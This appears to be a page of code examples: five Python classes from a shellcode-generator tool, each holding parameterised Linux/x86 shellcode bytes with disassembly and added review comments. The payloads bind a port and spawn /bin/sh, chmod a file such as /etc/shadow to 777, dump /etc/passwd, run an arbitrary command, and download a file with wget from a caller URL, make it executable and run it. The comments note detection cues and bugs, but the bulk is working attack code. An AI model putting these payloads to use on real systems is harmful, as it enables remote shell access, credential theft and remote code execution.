コード例 #1
class Payload(Shellcode):
    """Catalogue entry for a parameterised Linux/x86 payload template.

    The class body records author, name, references, size and a disassembly
    listing in ``Shellcode.info``; ``__init__`` stores the byte template with
    the caller's ``lport`` value spliced in.

    NOTE(review): the name and ``rawassembly`` describe only an execve of
    /bin/sh, while the template in ``__init__`` is much longer and embeds a
    port value. It looks like a socket listener followed by that execve
    stage -- confirm by disassembly, and do not triage a sample on this
    metadata alone.
    """
    # Every assignment below goes through the name `Shellcode`, i.e. into the
    # `info` mapping on the base class rather than a per-subclass copy
    # (presumably a plain dict shared by all payload classes -- verify).
    Shellcode.info["author"] = "xmgv"
    Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/36398/",
        "https://xmgv.wordpress.com/2015/02/19/28/",
    ]
    # NOTE(review): `kwargs` is not defined at class scope in the visible
    # code; unless the enclosing module binds that name, this line raises
    # NameError as soon as the class body executes.
    Shellcode.info["size"] = 94 + Shellcode.getsize(kwargs["lport"])
    # AT&T-syntax listing. 0x68732f2f and 0x6e69622f are the little-endian
    # bytes of "//sh" and "/bin"; with 0xb (execve on Linux/x86) in %al and
    # `int $0x80` they are typical signature material for this kind of stub.
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x68732f2f",
        "push   $0x6e69622f",
        "mov    %esp,%ebx",
        "push   %eax",
        "push   %ebx",
        "mov    %esp,%ecx",
        "mov    $0xb,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the payload template with ``kwargs["lport"]`` spliced in.

        Raises KeyError when ``lport`` is absent. The value is concatenated
        without any validation; presumably the caller supplies it already
        encoded as escaped text like the rest of the template -- verify
        against the caller. The base-class initialiser is not called here.
        """
        # Raw-string literals: each byte is kept as four-character
        # backslash-x text, not as a bytes object. The list ends up holding
        # one concatenated string.
        Shellcode.info["payload"] = [
            r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
            r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
            r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
            r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
            r"\xcd\x80\x93\x31\xc9\xb1\x02"
            r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
            r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
        ]
コード例 #2
class Payload(Shellcode):
    """Catalogue entry for a Linux/x86 template that acts on a file path.

    NOTE(review): the entry is named "file reader", but the listing in
    ``rawassembly`` loads syscall number 0xf (chmod on Linux/x86) with mode
    0x1ff (octal 777) and then exits; nothing in it opens or reads a file.
    Treat the observable effect as a permission change on the target path,
    which attribute-change auditing on sensitive files would record.
    """
    # Writes go into the `info` mapping on the Shellcode base class itself
    # (presumably shared by every payload class -- verify).
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37285/"
    ]
    # NOTE(review): `kwargs` is not defined at class scope in the visible
    # code; unless the enclosing module binds it, this raises NameError when
    # the class body executes.
    Shellcode.info["size"] = 19 + Shellcode.getsize(kwargs["file"])
    # AT&T-syntax listing with a fixed sample path: the three push constants
    # are the little-endian bytes of "adow", "c/sh" and "//et", which read
    # "//etc/shadow" on the stack. The generated template below uses the
    # caller's value in their place.
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x776f6461",
        "push   $0x68732f63",
        "push   $0x74652f2f",
        "mov    $0xf,%al",
        "mov    %esp,%ebx",
        "mov    $0x1ff,%cx",
        "int    $0x80",
        "xor    %eax,%eax",
        "inc    %eax",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the payload template with ``kwargs["file"]`` spliced in.

        Raises KeyError when ``file`` is absent. The value is concatenated
        unchecked; presumably it arrives as escaped push instructions for
        the path -- verify against the caller. The base-class initialiser is
        not called here.
        """
        # Raw strings keep each byte as backslash-x text rather than bytes;
        # the list holds a single concatenated string.
        Shellcode.info["payload"] = [
            r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff"
            r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
        ]
コード例 #3
class Payload(Shellcode):
    """Catalogue entry for a Linux/x86 template that reads a file to stdout.

    The listing in ``rawassembly`` issues four ``int $0x80`` calls with
    syscall numbers 5, 3, 4 and 1 (open, read, write, exit on Linux/x86):
    it opens a path, reads up to 0x1000 bytes, writes them to descriptor 1
    and exits. ``__init__`` stores the byte template with the caller's
    ``file`` value in place of the sample path.
    """
    # Writes go into the `info` mapping on the Shellcode base class itself
    # (presumably shared by every payload class -- verify). This entry uses
    # the same "name" string as the exploit-db 37285 entry although the
    # listings differ, so the name alone does not identify the behaviour.
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37297/"
    ]
    # NOTE(review): `kwargs` is not defined at class scope in the visible
    # code; unless the enclosing module binds it, this raises NameError when
    # the class body executes.
    Shellcode.info["size"] = 43 + Shellcode.getsize(kwargs["file"])
    # AT&T-syntax listing with a fixed sample path: the push constants are
    # the little-endian bytes of "sswd", "c/pa" and "//et", i.e.
    # "//etc/passwd" on the stack. %dx is set to 0xfff and incremented,
    # giving a 0x1000-byte read length.
    Shellcode.info["rawassembly"] = [
        "xor    %ecx,%ecx",
        "xor    %eax,%eax",
        "xor    %edx,%edx",
        "push   %ecx",
        "mov    $0x5,%al",
        "push   $0x64777373",
        "push   $0x61702f63",
        "push   $0x74652f2f",
        "mov    %esp,%ebx",
        "int    $0x80",
        "mov    %ebx,%ecx",
        "mov    %eax,%ebx",
        "mov    $0x3,%al",
        "mov    $0xfff,%dx",
        "inc    %dx",
        "int    $0x80",
        "xor    %eax,%eax",
        "xor    %ebx,%ebx",
        "mov    $0x1,%bl",
        "mov    $0x4,%al",
        "int    $0x80",
        "xor    %eax,%eax",
        "mov    $0x1,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the payload template with ``kwargs["file"]`` spliced in.

        Raises KeyError when ``file`` is absent. The value is concatenated
        unchecked; presumably it arrives as escaped push instructions for
        the path -- verify against the caller. The base-class initialiser is
        not called here.
        """
        # Raw strings keep each byte as backslash-x text rather than bytes;
        # the list holds a single concatenated string.
        Shellcode.info["payload"] = [
            r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
            r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
            r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
            r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
            r"\x80\x31\xc0\xb0\x01\xcd\x80"
        ]
コード例 #4
class Payload(Shellcode):
	"""Catalogue entry for a Linux/x86 template that runs a shell command.

	Unlike the neighbouring entries this one records no references and no
	disassembly listing. The fixed bytes in ``__init__`` contain the text
	"-c", "/sh" and "/bin", and the caller's command is embedded between
	them byte for byte, so the command text is recoverable from a captured
	payload with a plain strings pass.
	"""
	# Writes go into the `info` mapping on the Shellcode base class itself
	# (presumably shared by every payload class -- verify).
	Shellcode.info["author"] = "Unkown"
	Shellcode.info["name"] = "Linux/x86 - exec shellcode"
	# NOTE(review): `kwargs` is not defined at class scope in the visible
	# code; unless the enclosing module binds it, this raises NameError when
	# the class body executes.
	Shellcode.info["size"] = 36 + Shellcode.getsize(kwargs["execommand"])


	def __init__(self, **kwargs):
		"""Hex-escape ``kwargs["execommand"]`` and store the payload template.

		Raises KeyError when ``execommand`` is absent. The base-class
		initialiser is not called here.
		"""
		# Turn every character of the command into backslash-x text so it
		# matches the escaped form of the surrounding template.
		# NOTE(review): the "hex" codec on str exists only in Python 2; on
		# Python 3 this call raises LookupError.
		db = [] 
		for x in kwargs["execommand"]:
			db.append("\\x"+x.encode("hex"))
		# Rebinds the entry in the local kwargs dict only.
		kwargs["execommand"] = "".join(db)



		# Raw strings keep each byte as backslash-x text rather than bytes;
		# the list holds a single concatenated string. The command is
		# followed by a NUL byte in the template.
		Shellcode.info["payload"] = [
			r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
			r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
			r"\x00\x00\x00"
			+kwargs["execommand"]+
			r"\x00\x57\x53\x89\xe1\xcd\x80"
		]
コード例 #5
class Payload(Shellcode):
	"""Catalogue entry for a Linux/x86 download-and-execute template.

	The listing in ``rawassembly`` starts with syscall number 2 (fork on
	Linux/x86) and branches on the result. One path ends in an execve
	(0xb) of /usr/bin/wget with a URL argument; the other uses 0xa2, then
	0xf (chmod) with mode 0x1ff (octal 777) on a file name, then an execve
	of that same file. Which process takes which path is not verified
	here -- confirm by disassembly.

	For detection, the visible sequence is a wget child process followed by
	a permission change to 777 and execution of the fetched file.
	"""
	# Writes go into the `info` mapping on the Shellcode base class itself
	# (presumably shared by every payload class -- verify).
	Shellcode.info["author"] = "B3mB4m"
	Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode"
	Shellcode.info["references"] = [
		"https://www.exploit-db.com/exploits/39389/"
	]
	# NOTE(review): `kwargs` is not defined at class scope in the visible
	# code; unless the enclosing module binds it, this raises NameError when
	# the class body executes. The file name is counted twice, matching its
	# two uses in the template below. The URL is wrapped in a list while the
	# file name is passed bare -- confirm that getsize accepts both forms.
	Shellcode.info["size"] = \
			101 + Shellcode.getsize(kwargs["filename"])*2 + Shellcode.getsize([kwargs["url"]])
	

	# Intel-syntax listing (the other entries on this page use AT&T syntax)
	# with fixed sample values. The push constants 0x7273752f, 0x6e69622f,
	# 0x6567772f and the byte 0x74 are the little-endian bytes of
	# "/usr/bin/wget"; the six dword constants pushed after `cdq` hold a
	# sample host and path that the template replaces with kwargs["url"].
	Shellcode.info["rawassembly"] = [
		"xor eax,eax",
		"mov al,0x2",
		"int 0x80",
		"xor ebx,ebx",
		"cmp eax,ebx",
		"jz 0x47",
		"xor ecx,ecx",
		"xor ebx,ebx",
		"xor eax,eax",
		"push byte +0x5",
		"mov ecx,esp",
		"mov ecx,esp",
		"mov ebx,esp",
		"mov al,0xa2",
		"int 0x80",
		"xor ecx,ecx",
		"xor eax,eax",
		"push eax",
		"mov al,0xf",
		"push byte +0x68",
		"mov ebx,esp",
		"xor ecx,ecx",
		"mov cx,0x1ff",
		"int 0x80",
		"xor eax,eax",
		"push eax",
		"push byte +0x68",
		"mov ebx,esp",
		"push eax",
		"mov edx,esp",
		"push ebx",
		"mov ecx,esp",
		"mov al,0xb",
	 	"int 0x80",
		"xor eax,eax",
		"inc eax",
		"int 0x80",
		"push byte +0xb",
		"pop eax",
		"cdq",
		"push edx",
		"push dword 0x682f6365",
		"push dword 0x78652f2f",
		"push dword 0x6f692e62",
		"push dword 0x75687469",
		"push dword 0x672e6d34",
		"push dword 0x626d3362",
		"mov ecx,esp",
		"push edx",
		"push byte +0x74",
		"push dword 0x6567772f",
		"push dword 0x6e69622f",
		"push dword 0x7273752f",
		"mov ebx,esp",
		"push edx",
		"push ecx",
		"push ebx",
		"mov ecx,esp",
		"int 0x80",
	]

	
	def __init__(self, **kwargs): 
		"""Store the template with ``filename`` (twice) and ``url`` spliced in.

		Raises KeyError when ``filename`` or ``url`` is absent. Both values
		are concatenated unchecked; presumably they arrive as escaped push
		instructions -- verify against the caller. The base-class
		initialiser is not called here.
		"""
		# Raw strings keep each byte as backslash-x text rather than bytes;
		# the list holds a single concatenated string.
		Shellcode.info["payload"] = [
			r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
			r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
			r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
			r"\xc0\x50\xb0\x0f"
			+kwargs["filename"]+
			r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
			r"\xc0\x50"
			+kwargs["filename"]+
			r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
			r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52"
			+kwargs["url"]+
			r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
			r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
			r"\x52\x51\x53\x89\xe1\xcd\x80"

		]